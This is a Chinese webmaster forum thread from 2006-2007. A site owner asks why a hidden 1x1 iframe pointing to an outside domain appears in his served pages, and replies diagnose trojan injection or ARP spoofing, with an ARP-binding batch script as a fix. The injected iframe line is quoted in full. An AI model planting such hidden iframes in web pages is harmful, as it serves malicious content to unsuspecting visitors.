落伍者站长论坛 » 服务器技术及安全 » [急]网页无故出现多余的代码

风云在线 发表于 2006-12-9 10:14

[急]网页无故出现多余的代码

[url]http://www.fav001.com/[/url]
我的网页多了点代码
<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>

很多人浏览都一样
但是杀毒软件不报错(瑞星,金山,卖咖啡)
不过如果你要看,最好还是有杀毒软件


多于的代码不是被插入的
是直接被替换的
是直接在<html>代码的后面把我本来的代码替换成他的

本机和服务器的系统今天都重新做了

[color=Red]问题的关键在于：
在服务器中用浏览器打开是好好的
直接在服务器上用编辑器查看源代码也是好好的
但是网络上浏览就有问题了 [/color]

有没有人遇到过这种情况

oldfox 发表于 2006-12-9 14:07

*** 作者被禁止或删除 内容自动屏蔽 ***

sumy 发表于 2006-12-10 11:13

是不是在网页的最下方加的代码？而且全是index的网页？
应该是给别人挂上马了，尽早清除，我的服务器前段时间全部被挂马一天

[[i] 本帖最后由 sumy 于 2006-12-10 11:14 编辑 [/i]]

0_1 发表于 2006-12-12 11:50

　　估计是你网站后台系统或者服务器系统存在安全漏洞，别人挂了木马文件，然后修改了你的网页。

　　对你服务器上的文件进行关键字搜索，并结合服务器日志，找出漏洞所在，改进网站系统或提高服务器操作系统的安全设置。

网逍遥 发表于 2006-12-12 14:24

我主机中毒的现象和你的一模一样，至今也没办法解决！
重做系统也没用！

cherrybao 发表于 2006-12-12 15:21

可怜的

koyoyo 发表于 2006-12-13 00:53

我也被加上了一个[url]www.kkxc.net[/url]的弹窗，真是日了，垃圾站长，大家一起BS

jxchannel 发表于 2006-12-13 01:01

是服务器被黑，还是一个站被挂马，这个得分清楚。

网逍遥 发表于 2006-12-13 14:21

是服务器啦！
但在服务器里，用记事本打开网页，根本就找不到IF的代码

lanniao2 发表于 2006-12-15 01:14

[quote]原帖由 [i]网逍遥[/i] 于 2006-12-13 14:21 发表
是服务器啦！
但在服务器里，用记事本打开网页，根本就找不到IF的代码 [/quote]
是iis吗?  有没有被装 筛选器?

lxw 发表于 2006-12-16 00:02

被挂马了,如果用记事本打开找不到,看看有没有多余的object或者script标签

网逍遥 发表于 2006-12-17 15:31

不知这是什么毒来的

网逍遥 发表于 2006-12-18 10:08

目前为止，这毒没人能搞定

my432 发表于 2006-12-18 12:58

直接在IIS上加的代码
前两天有人发帖子说来着～
重装也不行？

渊龙 发表于 2007-1-4 00:27

重装。

屡教不改 发表于 2007-1-5 00:30

arp欺骗...
方法如下
建立一个arp.bat在启动项目内容如下
arp -d
arp -d
arp -d
arp -s 网关IP 网关MAC地址
arp -s 本机IP 本机MAC地址

联系机房 绑定MAC地址

渊龙 发表于 2007-1-7 13:30

确实是arp欺骗，百度有一篇“查凶办法”：

[url]http://zhidao.baidu.com/question/17663533.html[/url]

内存不足 发表于 2007-1-14 13:20

服务器已经被人家进入了,找我做安全吧

萌芽邪恶 发表于 2007-1-15 11:51

[quote]原帖由 [i]渊龙[/i] 于 2007-1-7 13:30 发表
确实是arp欺骗，百度有一篇“查凶办法”：

[url]http://zhidao.baidu.com/question/17663533.html[/url] [/quote]
;)

闪电冰激淋 发表于 2007-1-15 12:44

免杀马被,过你说的几个杀软,肯定是被人拿了SHELL..然后做了ASP文件备份...

不注意安全吧,现在出事了

查看完整版本: [急]网页无故出现多余的代码